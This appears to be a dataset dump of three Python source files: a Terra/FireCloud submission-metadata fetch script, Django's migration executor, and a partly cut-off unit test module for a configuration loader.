hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f72eaedaba0b8ff86ee1179bca09e69c0be08394 | 5,122 | py | Python | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | 1 | 2020-11-10T22:02:21.000Z | 2020-11-10T22:02:21.000Z | #!/usr/bin/env python3
import argparse
import copy
import datetime
#from firecloud import fiss
import json
import operator
import subprocess
import sys
import time
#print(fiss.meth_list(args=argparse.Namespace()))
import firecloud.api as fapi
# Terra/FireCloud coordinates of the workspace inspected by this script.
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'

#dir(fapi)
#help(fapi)

# List every method config in the workspace, then fetch the one for this tool.
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)

z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
                              config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
    """Write str(value) to the file named fname, replacing any prior content."""
    text = str(value)
    with open(fname, 'w') as fh:
        fh.write(text)
#z = fapi.create_submission(wnamespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE,
# cnamespace=SEL_NAMESPACE, config='dockstore-tool-cosi2')
#print('SUBMISSION IS', z, z.json())
#z = fapi.get_config_template(namespace='dockstore', method='dockstore-tool-cosi2', version=1)
#print(z.json())
def _pretty_print_json(json_dict, sort_keys=True):
"""Return a pretty-printed version of a dict converted to json, as a string."""
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
    """Pretty-print the keyword args as JSON to file `fname`, then convert to .org.

    Side effects: writes `fname`, and shells out to ./util/to_org.sh, which is
    expected to exist relative to the current working directory.
    """
    dump_file(fname=fname, value=_pretty_print_json(json_dict))
    print('converting', fname, 'to org')
    # shell=True is acceptable here only because fname comes from code in this
    # script, never from user input.
    subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
    print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
    """Request the metadata for a workflow in a submission, asking the server
    for gzip-compressed transport.

    Args:
        namespace (str): project to which workspace belongs
        workspace (str): Workspace name
        submission_id (str): Submission's unique identifier
        workflow_id (str): Workflow's unique identifier.

    Swagger:
        https://api.firecloud.org/#!/Submissions/workflowMetadata
    """
    uri = f"workspaces/{namespace}/{workspace}/submissions/{submission_id}/workflows/{workflow_id}"
    headers = copy.deepcopy(fapi._fiss_agent_header())
    headers['Accept-Encoding'] = 'gzip'
    headers['User-Agent'] = 'gzip'
    return fapi.__get(uri, headers=headers)
#print('ENTITIES ARE', fapi.list_entity_types(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE).json())

# Main script body: dump today's submissions in the workspace, together with
# per-workflow Cromwell metadata, into tmp/*.json (converted to .org by
# _write_json); also save the submitted WDL when present.
z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
#print('SUBMISSIONS ARE', z, z.json())
_write_json('tmp/submissions.json', **{'result': list(z.json())})

tot_time = 0  # cumulative seconds spent fetching workflow metadata
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
    print('looking at submission from', s['submissionDate'])
    submission_date = s['submissionDate']
    # Only process submissions made today; submissionDate is an ISO timestamp.
    if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
        print('skipping submission date ', submission_date)
        continue
    print('====================================================')
    print(s)
    print('getting submission')
    submission_id = s['submissionId']
    y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
    print('got submission')
    _write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
    # NOTE(review): only the first workflow of each submission is examined.
    if 'workflowId' not in y['workflows'][0]:
        print('workflow ID missing from submission!')
        continue
    print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
    beg = time.time()
    zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
                                         workflow_id=y['workflows'][0]['workflowId'])
    # Debug dump of the raw requests.Response object and its attributes.
    print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
    for f in dir(zz_result):
        print(' ', f, ' = ', getattr(zz_result, f))
    print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
    for f in dir(zz_result.raw):
        print(' ', f, ' = ', getattr(zz_result.raw, f))
    print('converting workflow metadata to json')
    try:
        zz = zz_result.json()
    except Exception as e:
        # Best-effort: keep going with empty metadata if the body isn't JSON.
        print('Error converting to json:', e)
        zz = {}
    tot_time += (time.time() - beg)
    print('saving workflow metadata')
    _write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
    if 'submittedFiles' in zz:
        dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
    #succ = [v["succeeded"] for v in zz['outputs']["run_sims_cosi2.replicaInfos"]]
    #print(f'Succeeded: {sum(succ)} of {len(succ)}')
# zzz = fapi.get_workflow_metadata(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=s['submissionId'],
#                                  workflow_id='ad1e8271-fe66-4e05-9005-af570e9e5884').json()
# _write_json('tmp/jz.json', **zzz)
print('tot_time=', tot_time, file=sys.stderr)
| 42.330579 | 135 | 0.679617 |
import argparse
import copy
import datetime
import json
import operator
import subprocess
import sys
import time
import firecloud.api as fapi
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)
z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
with open(fname, 'w') as out:
out.write(str(value))
def _pretty_print_json(json_dict, sort_keys=True):
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
dump_file(fname=fname, value=_pretty_print_json(json_dict))
print('converting', fname, 'to org')
subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
uri = "workspaces/{0}/{1}/submissions/{2}/workflows/{3}".format(namespace,
workspace, submission_id, workflow_id)
headers = copy.deepcopy(fapi._fiss_agent_header())
headers.update({'Accept-Encoding': 'gzip', 'User-Agent': 'gzip'})
return fapi.__get(uri, headers=headers)
z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
_write_json('tmp/submissions.json', **{'result': list(z.json())})
tot_time = 0
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
print('looking at submission from', s['submissionDate'])
submission_date = s['submissionDate']
if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
print('skipping submission date ', submission_date)
continue
print('====================================================')
print(s)
print('getting submission')
submission_id = s['submissionId']
y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
print('got submission')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
if 'workflowId' not in y['workflows'][0]:
print('workflow ID missing from submission!')
continue
print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
beg = time.time()
zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
workflow_id=y['workflows'][0]['workflowId'])
print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
for f in dir(zz_result):
print(' ', f, ' = ', getattr(zz_result, f))
print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
for f in dir(zz_result.raw):
print(' ', f, ' = ', getattr(zz_result.raw, f))
print('converting workflow metadata to json')
try:
zz = zz_result.json()
except Exception as e:
print('Error converting to json:', e)
zz = {}
tot_time += (time.time() - beg)
print('saving workflow metadata')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
if 'submittedFiles' in zz:
dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
print('tot_time=', tot_time, file=sys.stderr)
| true | true |
f72eaf3c67b409384826a341503758bb4a502d32 | 14,180 | py | Python | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
    """
    End-to-end migration execution - loads migrations, and runs them
    up or down to a specified set of targets.
    """

    def __init__(self, connection, progress_callback=None):
        # progress_callback, if given, is invoked with an event-name string
        # ("render_start", "apply_success", ...) plus optional migration/fake args.
        self.connection = connection
        self.loader = MigrationLoader(self.connection)
        self.recorder = MigrationRecorder(self.connection)
        self.progress_callback = progress_callback

    def migration_plan(self, targets, clean_start=False):
        """
        Given a set of targets, returns a list of (Migration instance, backwards?).

        With clean_start=True, plans as if no migration had been applied yet.
        """
        plan = []
        if clean_start:
            applied = set()
        else:
            applied = set(self.loader.applied_migrations)
        for target in targets:
            # If the target is (app_label, None), that means unmigrate everything
            if target[1] is None:
                for root in self.loader.graph.root_nodes():
                    if root[0] == target[0]:
                        for migration in self.loader.graph.backwards_plan(root):
                            if migration in applied:
                                plan.append((self.loader.graph.nodes[migration], True))
                                applied.remove(migration)
            # If the migration is already applied, do backwards mode,
            # otherwise do forwards mode.
            elif target in applied:
                # Don't migrate backwards all the way to the target node (that
                # may roll back dependencies in other apps that don't need to
                # be rolled back); instead roll back through target's immediate
                # child(ren) in the same app, and no further.
                next_in_app = sorted(
                    n for n in
                    self.loader.graph.node_map[target].children
                    if n[0] == target[0]
                )
                for node in next_in_app:
                    for migration in self.loader.graph.backwards_plan(node):
                        if migration in applied:
                            plan.append((self.loader.graph.nodes[migration], True))
                            applied.remove(migration)
            else:
                for migration in self.loader.graph.forwards_plan(target):
                    if migration not in applied:
                        plan.append((self.loader.graph.nodes[migration], False))
                        applied.add(migration)
        return plan

    def migrate(self, targets, plan=None, fake=False, fake_initial=False):
        """
        Migrates the database up to the given targets.

        Django first needs to create all project states before a migration is
        (un)applied and in a second step run all the database operations.
        """
        if plan is None:
            plan = self.migration_plan(targets)
        # Create the forwards plan Django would follow on an empty database
        full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)

        all_forwards = all(not backwards for mig, backwards in plan)
        all_backwards = all(backwards for mig, backwards in plan)

        if not plan:
            pass  # Nothing to do for an empty plan
        elif all_forwards == all_backwards:
            # This should only happen if there's a mixed plan
            raise InvalidMigrationPlan(
                "Migration plans with both forwards and backwards migrations "
                "are not supported. Please split your migration process into "
                "separate plans of only forwards OR backwards migrations.",
                plan
            )
        elif all_forwards:
            self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
        else:
            # No need to check for `elif all_backwards` here, as that condition
            # would always evaluate to true.
            self._migrate_all_backwards(plan, full_plan, fake=fake)

        self.check_replacements()

    def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
        """
        Take a list of 2-tuples of the form (migration instance, False) and
        apply them in the order they occur in the full_plan.
        """
        migrations_to_run = {m[0] for m in plan}
        state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
        for migration, _ in full_plan:
            if not migrations_to_run:
                # We remove every migration that we applied from this set so
                # that we can bail out once the last migration has been applied
                # and don't always run until the very end of the migration
                # process.
                break
            if migration in migrations_to_run:
                if 'apps' not in state.__dict__:
                    if self.progress_callback:
                        self.progress_callback("render_start")
                    state.apps  # Render all -- performance critical
                    if self.progress_callback:
                        self.progress_callback("render_success")
                state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
                migrations_to_run.remove(migration)
            else:
                # Not scheduled to run: just advance the project state past it.
                migration.mutate_state(state, preserve=False)

    def _migrate_all_backwards(self, plan, full_plan, fake):
        """
        Take a list of 2-tuples of the form (migration instance, True) and
        unapply them in reverse order they occur in the full_plan.

        Since unapplying a migration requires the project state prior to that
        migration, Django will compute the migration states before each of them
        in a first run over the plan and then unapply them in a second run over
        the plan.
        """
        migrations_to_run = {m[0] for m in plan}
        # Holds all migration states prior to the migrations being unapplied
        states = {}
        state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
        if self.progress_callback:
            self.progress_callback("render_start")
        for migration, _ in full_plan:
            if not migrations_to_run:
                # We remove every migration that we applied from this set so
                # that we can bail out once the last migration has been applied
                # and don't always run until the very end of the migration
                # process.
                break
            if migration in migrations_to_run:
                if 'apps' not in state.__dict__:
                    state.apps  # Render all -- performance critical
                # The state before this migration
                states[migration] = state
                # The old state keeps as-is, we continue with the new state
                state = migration.mutate_state(state, preserve=True)
                migrations_to_run.remove(migration)
            else:
                migration.mutate_state(state, preserve=False)
        if self.progress_callback:
            self.progress_callback("render_success")

        # Second pass: actually unapply, using the pre-computed states.
        for migration, _ in plan:
            self.unapply_migration(states[migration], migration, fake=fake)

    def collect_sql(self, plan):
        """
        Takes a migration plan and returns a list of collected SQL
        statements that represent the best-efforts version of that plan.
        """
        statements = []
        state = None
        for migration, backwards in plan:
            with self.connection.schema_editor(collect_sql=True) as schema_editor:
                if state is None:
                    state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
                if not backwards:
                    state = migration.apply(state, schema_editor, collect_sql=True)
                else:
                    state = migration.unapply(state, schema_editor, collect_sql=True)
            statements.extend(schema_editor.collected_sql)
        return statements

    def apply_migration(self, state, migration, fake=False, fake_initial=False):
        """
        Runs a migration forwards and records it as applied.

        Returns the project state after the migration.
        """
        if self.progress_callback:
            self.progress_callback("apply_start", migration, fake)
        if not fake:
            if fake_initial:
                # Test to see if this is an already-applied initial migration
                applied, state = self.detect_soft_applied(state, migration)
                if applied:
                    fake = True
            if not fake:
                # Alright, do it normally
                with self.connection.schema_editor() as schema_editor:
                    state = migration.apply(state, schema_editor)
        # For replacement migrations, record individual statuses
        if migration.replaces:
            for app_label, name in migration.replaces:
                self.recorder.record_applied(app_label, name)
        else:
            self.recorder.record_applied(migration.app_label, migration.name)
        # Report progress
        if self.progress_callback:
            self.progress_callback("apply_success", migration, fake)
        return state

    def unapply_migration(self, state, migration, fake=False):
        """
        Runs a migration backwards and records it as unapplied.

        Returns the project state after the unapply.
        """
        if self.progress_callback:
            self.progress_callback("unapply_start", migration, fake)
        if not fake:
            with self.connection.schema_editor() as schema_editor:
                state = migration.unapply(state, schema_editor)
        # For replacement migrations, record individual statuses
        if migration.replaces:
            for app_label, name in migration.replaces:
                self.recorder.record_unapplied(app_label, name)
        else:
            self.recorder.record_unapplied(migration.app_label, migration.name)
        # Report progress
        if self.progress_callback:
            self.progress_callback("unapply_success", migration, fake)
        return state

    def check_replacements(self):
        """
        Mark replacement migrations applied if their replaced set all are.

        We do this unconditionally on every migrate, rather than just when
        migrations are applied or unapplied, so as to correctly handle the case
        when a new squash migration is pushed to a deployment that already had
        all its replaced migrations applied. In this case no new migration will
        be applied, but we still want to correctly maintain the applied state
        of the squash migration.
        """
        applied = self.recorder.applied_migrations()
        for key, migration in self.loader.replacements.items():
            all_applied = all(m in applied for m in migration.replaces)
            if all_applied and key not in applied:
                self.recorder.record_applied(*key)

    def detect_soft_applied(self, project_state, migration):
        """
        Tests whether a migration has been implicitly applied - that the
        tables or columns it would create exist. This is intended only for use
        on initial migrations (as it only looks for CreateModel and AddField).

        Returns (applied?, project state after the migration).
        """
        if migration.initial is None:
            # Bail if the migration isn't the first one in its app
            if any(app == migration.app_label for app, name in migration.dependencies):
                return False, project_state
        elif migration.initial is False:
            # Bail if it's NOT an initial migration
            return False, project_state

        if project_state is None:
            after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
        else:
            after_state = migration.mutate_state(project_state)
        apps = after_state.apps
        found_create_model_migration = False
        found_add_field_migration = False
        # Make sure all create model and add field operations are done
        for operation in migration.operations:
            if isinstance(operation, migrations.CreateModel):
                model = apps.get_model(migration.app_label, operation.name)
                if model._meta.swapped:
                    # We have to fetch the model to test with from the
                    # embedded app cache, as it's not a direct dependency.
                    model = global_apps.get_model(model._meta.swapped)
                if model._meta.proxy or not model._meta.managed:
                    continue
                if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
                    return False, project_state
                found_create_model_migration = True
            elif isinstance(operation, migrations.AddField):
                model = apps.get_model(migration.app_label, operation.model_name)
                if model._meta.swapped:
                    # We have to fetch the model to test with from the
                    # embedded app cache, as it's not a direct dependency.
                    model = global_apps.get_model(model._meta.swapped)
                if model._meta.proxy or not model._meta.managed:
                    continue
                table = model._meta.db_table
                db_field = model._meta.get_field(operation.name).column
                fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
                if db_field not in (f.name for f in fields):
                    return False, project_state
                found_add_field_migration = True
        # If we get this far and we found at least one CreateModel or AddField migration,
        # the migration is considered implicitly applied.
        return (found_create_model_migration or found_add_field_migration), after_state
| 47.424749 | 115 | 0.61488 | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
elif target in applied:
# may roll back dependencies in other apps that don't need to
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
pass # Nothing to do for an empty plan
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
migrations_to_run = {m[0] for m in plan}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
for migration, _ in full_plan:
if not migrations_to_run:
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
def _migrate_all_backwards(self, plan, full_plan, fake):
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps
states[migration] = state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
def collect_sql(self, plan):
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.apply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.unapply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
if migration.initial is None:
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
table = model._meta.db_table
db_field = model._meta.get_field(operation.name).column
fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
if db_field not in (f.name for f in fields):
return False, project_state
found_add_field_migration = True
return (found_create_model_migration or found_add_field_migration), after_state
| true | true |
f72eafd27fb8361f96937936ad725718e5ac8bea | 3,705 | py | Python | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | 2 | 2022-03-31T03:01:39.000Z | 2022-03-31T03:02:48.000Z | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
    """Unit tests for bat.conf.get_config's layered configuration lookup."""

    def setUp(t):
        # Patch bat.conf.FileConfig for every test; individual tests override
        # its return value as needed.
        patches = ['FileConfig', ]
        for target in patches:
            patcher = patch(f'{SRC}.{target}', autospec=True)
            setattr(t, target, patcher.start())
            t.addCleanup(patcher.stop)

        # Shape of the on-disk config file the tests pretend to read.
        t.config_file_data = {
            'default': 'test_config',
            'test_config': {
                'bat': {
                    'AModule': {
                        'arg_1': 'conf_file_arg_1',
                        'arg_2': 'conf_file_arg_2',
                    },
                    'BModule': {'arg_1': '2020-20-21', },
                }
            }
        }

        # Per-module config dataclasses with defaults, built fresh per test.
        @dataclass
        class ConfA:
            arg_1: str = 'dataclass_default_arg_1'
            arg_2: str = 'dataclass_default_arg_2'
            arg_3: str = 'dataclass_default_arg_3'

        @dataclass
        class ConfB:
            arg_1: str = 'dataclass_default_isodate'

        # As if imported from a module
        ConfA.__module__ = 'bat.AModule'
        ConfB.__module__ = 'bat.BModule'

        @dataclass
        class GlobalConfig:
            AModule: ConfA
            BModule: ConfB
            config_file: str = './GlobalConfig.yaml'

        GlobalConfig.__module__ = 'bat'
        t.GlobalConfig = GlobalConfig

    @patch(f'{SRC}.EnvConfig', autospec=True)
    def test_default_values(t, EnvConfig):
        '''With no file or env config, dataclass defaults are returned
        '''
        t.FileConfig.return_value = None
        EnvConfig.return_value = None
        CONF = get_config(t.GlobalConfig)
        t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
        t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')

    def test_arg_cli_args(t):
        '''Values given on the command line take priority
        '''
        cli_args = Namespace(arg_1='cli_arg_1')
        conf = get_config(t.GlobalConfig, cli_args=cli_args)
        t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')

    def test_arg_config_file(t):
        '''The given config_file parameter is used for attribute lookups
        '''
        config_file = t.FileConfig.return_value
        conf = get_config(t.GlobalConfig, config_file=config_file)
        t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
        config_file.get.assert_called_with('arg_1', module='bat.AModule')

    def test_arg_config_file_name(t):
        '''The given config_file_name is passed to the FileConfig constructor
        '''
        config_file_name = './test.config.yaml'
        get_config(
            t.GlobalConfig, config_file_name=config_file_name
        )
        t.FileConfig.assert_called_with(config_file_name, config_env=None)

    def test_arg_config_env(t):
        '''The given config_env name is passed to the FileConfig constructor
        '''
        config_env = 'configuration file environment'
        get_config(t.GlobalConfig, config_env=config_env)
        t.FileConfig.assert_called_with(None, config_env=config_env)

    @patch(f'{SRC}.EnvConfig', autospec=True)
    def test__getattr__missing_attribute(t, EnvConfig):
        '''Unknown attributes raise AttributeError rather than returning None
        '''
        t.FileConfig.return_value = None
        EnvConfig.return_value = None
        conf = get_config(t.GlobalConfig)
        with t.assertRaises(AttributeError):
            conf._sir_not_appearing_in_this_film
| 28.5 | 77 | 0.615115 | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
